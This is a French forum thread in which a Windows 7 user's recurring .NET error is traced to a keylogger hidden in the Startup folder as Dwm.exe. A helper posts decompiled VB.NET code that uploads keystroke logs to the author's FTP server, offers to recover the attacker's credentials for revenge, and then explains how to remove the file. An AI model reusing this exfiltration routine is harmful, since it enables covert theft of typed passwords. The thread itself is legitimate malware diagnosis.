[Résolu] Message d'erreur de Windows 7.

Salut !

Mon PC avec windows 7 m'envoie très souvent ce message d'erreur complètement inutile car tout marche aussi bien avant qu'après:



Quelqu'un sait comment faire pour qu'il ne me l'envoie plus ?

reinstaller framework.net ?

Essaye de mettre mettre à jour Framework.

Merci de votre aide mais quand j'installe framework a partir du site de microsoft, il me disent ça:



Et il n'y a aucune option "Activer ou desacter des fonctionnalitées windows".

EDIT: J'ai finalement trouvé l'option et j'ai j'ai modifié quelques paramètres, j'espère que ça va marcher.

Ton premier message vient d'une application qui essaye de se connecter à un serveur, mais celui-ci n'interprète pas bien la demande (soit il est down, soit l'application contient une erreur, de mot de passe par exemple). D'ailleurs ils ont oublié de faire la gestion d'erreur dans l'application...Bref

Tu as appuyé sur "détails" ?

La seule fois que j'ai vu ça c'était pour un keylogger:-x

Pour le deuxième message, tu peux suivre ces tutos :

http://www.pcinpact.com/astuces/windows-7/154-vista-fonctionnalites-services.html

http://www.laboratoire-microsoft.org/t/23891/

Merci Google .

Merci Ouathe... Obama, dès qu'il me le réenvoie, je te copy/paste les détails.

Ok no prob

Voici donc les détails (ça parle mème de strings):

Consultez la fin de ce message pour plus de détails sur l'appel du débogage
juste-à-temps (JIT) à la place de cette boîte de dialogue.

************** Texte de l'exception **************
System.Net.WebException: Impossible de se connecter au serveur distant
à System.Net.WebClient.UploadFile(Uri address, String method, String fileName)
à Microsoft.VisualBasic.MyServices.Internal.WebClientCopy.UploadFile(String sourceFileName, Uri address)
à Microsoft.VisualBasic.Devices.Network.UploadFile(String sourceFileName, Uri address, ICredentials networkCredentials, Boolean showUI, Int32 connectionTimeout, UICancelOption onUserCancel)
à Microsoft.VisualBasic.Devices.Network.UploadFile(String sourceFileName, String address, String userName, String password, Boolean showUI, Int32 connectionTimeout, UICancelOption onUserCancel)
à Microsoft.VisualBasic.Devices.Network.UploadFile(String sourceFileName, String address, String userName, String password)
à paradis.Form1.Send()
à System.Windows.Forms.Timer.OnTick(EventArgs e)
à System.Windows.Forms.Timer.TimerNativeWindow.WndProc(Message& m)
à System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg, IntPtr wparam, IntPtr lparam)


************** Assemblys chargés **************
mscorlib
Version de l'assembly : 2.0.0.0
Version Win32 : 2.0.50727.4927 (NetFXspW7.050727-4900)
CodeBase : file:///C:/Windows/Microsoft.NET/Framework64/v2.0.50727/mscorlib.dll
----------------------------------------
Sohck V2
Version de l'assembly : 1.0.0.0
Version Win32 : 1.0.0.0
CodeBase : file:///C:/Users/Charles/AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Startup/Dwm.exe
----------------------------------------
Microsoft.VisualBasic
Version de l'assembly : 8.0.0.0
Version Win32 : 8.0.50727.4927 (NetFXspW7.050727-4900)
CodeBase : file:///C:/Windows/assembly/GAC_MSIL/Microsoft.VisualBasic/8.0.0.0__b03f5f7f11d50a3a/Microsoft.VisualBasic.dll
----------------------------------------
System
Version de l'assembly : 2.0.0.0
Version Win32 : 2.0.50727.4927 (NetFXspW7.050727-4900)
CodeBase : file:///C:/Windows/assembly/GAC_MSIL/System/2.0.0.0__b77a5c561934e089/System.dll
----------------------------------------
System.Windows.Forms
Version de l'assembly : 2.0.0.0
Version Win32 : 2.0.50727.4927 (NetFXspW7.050727-4900)
CodeBase : file:///C:/Windows/assembly/GAC_MSIL/System.Windows.Forms/2.0.0.0__b77a5c561934e089/System.Windows.Forms.dll
----------------------------------------
System.Drawing
Version de l'assembly : 2.0.0.0
Version Win32 : 2.0.50727.4927 (NetFXspW7.050727-4900)
CodeBase : file:///C:/Windows/assembly/GAC_MSIL/System.Drawing/2.0.0.0__b03f5f7f11d50a3a/System.Drawing.dll
----------------------------------------
System.Runtime.Remoting
Version de l'assembly : 2.0.0.0
Version Win32 : 2.0.50727.4927 (NetFXspW7.050727-4900)
CodeBase : file:///C:/Windows/assembly/GAC_MSIL/System.Runtime.Remoting/2.0.0.0__b77a5c561934e089/System.Runtime.Remoting.dll
----------------------------------------
Accessibility
Version de l'assembly : 2.0.0.0
Version Win32 : 2.0.50727.4927 (NetFXspW7.050727-4900)
CodeBase : file:///C:/Windows/assembly/GAC_MSIL/Accessibility/2.0.0.0__b03f5f7f11d50a3a/Accessibility.dll
----------------------------------------
System.Configuration
Version de l'assembly : 2.0.0.0
Version Win32 : 2.0.50727.4927 (NetFXspW7.050727-4900)
CodeBase : file:///C:/Windows/assembly/GAC_MSIL/System.Configuration/2.0.0.0__b03f5f7f11d50a3a/System.Configuration.dll
----------------------------------------
System.Xml
Version de l'assembly : 2.0.0.0
Version Win32 : 2.0.50727.4927 (NetFXspW7.050727-4900)
CodeBase : file:///C:/Windows/assembly/GAC_MSIL/System.Xml/2.0.0.0__b77a5c561934e089/System.Xml.dll
----------------------------------------
System.resources
Version de l'assembly : 2.0.0.0
Version Win32 : 2.0.50727.4927 (NetFXspW7.050727-4900)
CodeBase : file:///C:/Windows/assembly/GAC_MSIL/System.resources/2.0.0.0_fr_b77a5c561934e089/System.resources.dll
----------------------------------------
System.Windows.Forms.resources
Version de l'assembly : 2.0.0.0
Version Win32 : 2.0.50727.4927 (NetFXspW7.050727-4900)
CodeBase : file:///C:/Windows/assembly/GAC_MSIL/System.Windows.Forms.resources/2.0.0.0_fr_b77a5c561934e089/System.Windows.Forms.resources.dll
----------------------------------------
mscorlib.resources
Version de l'assembly : 2.0.0.0
Version Win32 : 2.0.50727.4927 (NetFXspW7.050727-4900)
CodeBase : file:///C:/Windows/Microsoft.NET/Framework64/v2.0.50727/mscorlib.dll
----------------------------------------

************** Débogage JIT **************
Pour activer le débogage juste-à-temps (JIT), le fichier de configuration pour cette
application ou cet ordinateur (machine.config) doit avoir la valeur
jitDebugging définie dans la section system.windows.forms.
L'application doit également être compilée avec le débogage
activé.

Par exemple :

<configuration>
<system.windows.forms jitDebugging="true" />
</configuration>

Lorsque le débogage juste-à-temps est activé, les exceptions non gérées
seront envoyées au débogueur JIT inscrit sur l'ordinateur
plutôt que d'être gérées par cette boîte de dialogue.

Oh merde:-o
Mec je veux pas te stresser mais ça, c'est typique d'un keylogger. Son auteur ne sait pas programmer d'ailleurs (je me la pète un peu en passant).

Je m'explique :

Déjà string c'est pas ce que tu penses mais une chaîne de caractère en anglais. Ensuite, tu peux voir un uploadfile qui est suffisament explicite pour savoir ce qui se passe : le keylogger aimerait envoyer les logs. Tu peux ensuite voir "username" et "password", c'est tout simplement le nom/mdp de l'auteur pour pouvoir envoyer les logs sur son ftp ou compte mail.

Bref je suis pas certain a 100 % donc fais ce qui suit :

Vas dans c:/users/Charles/appdata/roaming/Microsoft/Windows/Start menu/programs/startup/

Ici on est dans le dossier du démarrage système, et que fait en premier un keylogger ?
Il s'ajoute au démarrage du système.
Tu vois un programme dwm.exe, tu le coupes, le colles sur le bureau et le scannes en ligne sur http://scanner.novirusthanks.org (dsl si c'est pas le bon lien, je suis sur mon téléphone portable) et tu me colles le résultat ici, et si c'est marqué INFECTED tu le supprimes cash.

Ah oui je viens de voir que c'est le timer qui a génèré l'erreur, et que fait un keylogger ? Il envoie les touches tapées au clavier selon un intervalle donné, le tout spécifié par le timer.

Bref je suis quasi sur que c'est ça, sinon je m'en excuse par avance et fais gaffe a ce que tu tapes au clavier ...

ÉDIT tardive : j'ai cru lire "m'envoie très souvent ce message d'erreur"

J'en suis sur à 99 % maintenant.

Re EDIT : en fait si tu veux te venger et si il est INFECTED tu me l'envoies par mp avant de le supprimer, je retrouve le compte et mdp, sauf si vraiment il sont cryptés.:-x
Ou carrément, upload-le sur megaupload par exemple et envoie moi le quoi qu'il arrive, je pourrai te donner plus de détails.

Merci obama, il est en train de scanner, j'édite dans quelques minutes.

Il en met du temps ... Et si c'est bien ce que tu pense, il doit en chier depuis que je joue a transformice .

Résultat: CLEAN

Report date: 2010-05-29 01:58:36 (GMT 1)
File name: Dwm.exe
File size: 66560 bytes
MD5 hash: * caché car peut ètre information personnelle importante
SHA1 hash: * caché car peut ètre information personnelle importante
Detection rate: 0 on 19 (0%)
Status: CLEAN
Antivirus Database Engine Result
a-squared 5.0.0.7 -
Avast 100331-1 4.8.1368 -
AVG 271.1.1/2901 9.0.0.725 -
Avira AntiVir 7.10.7.193 7.6.0.59 -
BitDefender 29/05/2010 7.0.0.2555 -
ClamAV 28/05/2010 0.96.1 -
Comodo 3468 3.13.579 -
Dr.Web 29/05/2010 5.0 -
F-PROT6 20100528 4.5.1.85 -
G-Data 21.248 2.0.7309.847 -
Ikarus T3 28/05/2010 1.1.84.0 -
Kaspersky 29/05/2010 9.0.0.736 -
NOD32 5154 4.0.474 -
Panda 27/05/2010 10.0.3.0 -
Solo 29/05/2010 9.0-2010 -
TrendMicro 203 9.120-1004 -
VBA32 29/05/2010 3.12.12.2 -
VirusBuster 1.5.6 -
Zoner 29/05/2010 0.2 -
Extra information
File type: Executable File (EXE)
Packer: Nothing found
Binder detector: Nothing found
PDF analyzer: Nothing found

Hmm ok bon ça reste bizarre. Bah écoute si tu peux quand même l'envoyer pour en être sur ça serait bien.
Si tu viens juste de l'avoir eu c'est "normal" qu'il soit clean.

66 Ko, c'est la taille adéquate, et oui il a du en chier avec Transformice:-o

Hum ... Comment on upload sur magaupload ?

Tu vas sur http://www.megaupload.com/
Et ici:


Tu choisis ton fichier puis tu lui mets un titre (Dans la case envoyer)

Merci -Rom1- .

Ah bah VOILA !


Bingo, c'est bel et bien un keylogger, voici une partie du code source :

Private Sub Send()
Dim file As String = Me.GetFile
Dim path As String = (MyProject.Computer.FileSystem.SpecialDirectories.Temp & "\temp")
Dim writer As New StreamWriter(path)
writer.Write(Me.Keylogger.KeyLog)
writer.Close
Me.Keylogger.KeyLog = ""
MyProject.Computer.Network.UploadFile(path, (Me.Ftphost & "/" & file), Me.FtpUsername, Me.FtpPassword)
File.Delete(path)
End Sub



Qu'est-ce que ça fait ?

Eh bien c'est tout simplement la sous procédure qui créer un fichier de log dans le dossier temporaire, qui l'upload sur le ftp de son auteur.

Dans le reste du code on peut voir toute la partie qui sert à enregistrer les touches tapées. On voit aussi le code envoyant la fenêtre active a chaque instant. Bref un keylogger comme prévu

Tu peux donc le supprimer librement. J'ajouterais que c'est un builder qui a été utilisé car le compte/mdp n'apparaissent pas directement.


En gros j'ai fait une belle démonstration pour dire que les antis virus ne protègent pas à 100 %

Auteur de Dwm.exe si tu me lis : YOU FAILED

A ta place j'aurais mis un...nan je vais pas dévoiler ça:-x

Voili voilou.

Merci Obama, je te vénère !

Hum... quand je clique sur supprimer, il me dit: "Cette action ne peut pas ètre réalisée car le fichier est ouvert dans


Fermez le fichier et réessayez."

De rien en tout cas je pense aussi que lorsqu'il a reçu dans les logs :

[fleche droite] [fleche droite] [fleche droite] [fleche droite] [fleche droite] [fleche droite] [fleche droite] [fleche droite] [fleche droite] [fleche droite] [fleche droite] [fleche droite] [fleche droite] [fleche droite] [fleche droite] [fleche droite] [fleche droite] [fleche droite] [fleche droite] [fleche droite] [fleche droite] [fleche droite] [fleche droite] [fleche droite] [fleche droite] [fleche droite] [fleche droite] [fleche droite] [fleche droite] [fleche droite] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut] [fleche haut]

et je reduis énormément, il a changé son mdp pour ne plus recevoir de logs, le problème c'est que le keylogger n'avait pas prévu de gérer l'erreur.



EDIT : ah bah oui normal, car il est ouvert encore, vas dans le gestionnaire de tâches (CTRL ALT SUPPR) et Arrête le processus de Dwm.exe, puis supprime-le.

Et voila, c'est réglé, encore merci !

J'ai un autre petit problème, beaucoup moins grave et très rare, une toute petite fenètre apellée Form1 apparais quelques instant (secondes), puis disparait toute seule. Je ne sait pas si c'est lié mais elle viens juste de souvrir/fermer après que j'ai mis Dwm.exe dans la corbeille.

Tout à fait normal, car le keylogger c'est une fenêtre transparente, cachée, minimisée et toute petite. Normalement il a été correctement supprimé, regarde quand même dans ton gestio, si il n'y a plus rien, et si il n'y a pas d'autres programmes dans ce genre.

Vide la corbeille, et c'est réglé.

il y a bien un autre dwm.exe mais sans majuscule et il y a marqué "Gestionnaire de fenètres du bureau" dans la description.

J'ai aussi 3 Processus sans description: csrss.exe, ateclxx.exe et winlogon.exe (ils prennent tous environ 2 000K de mémoire).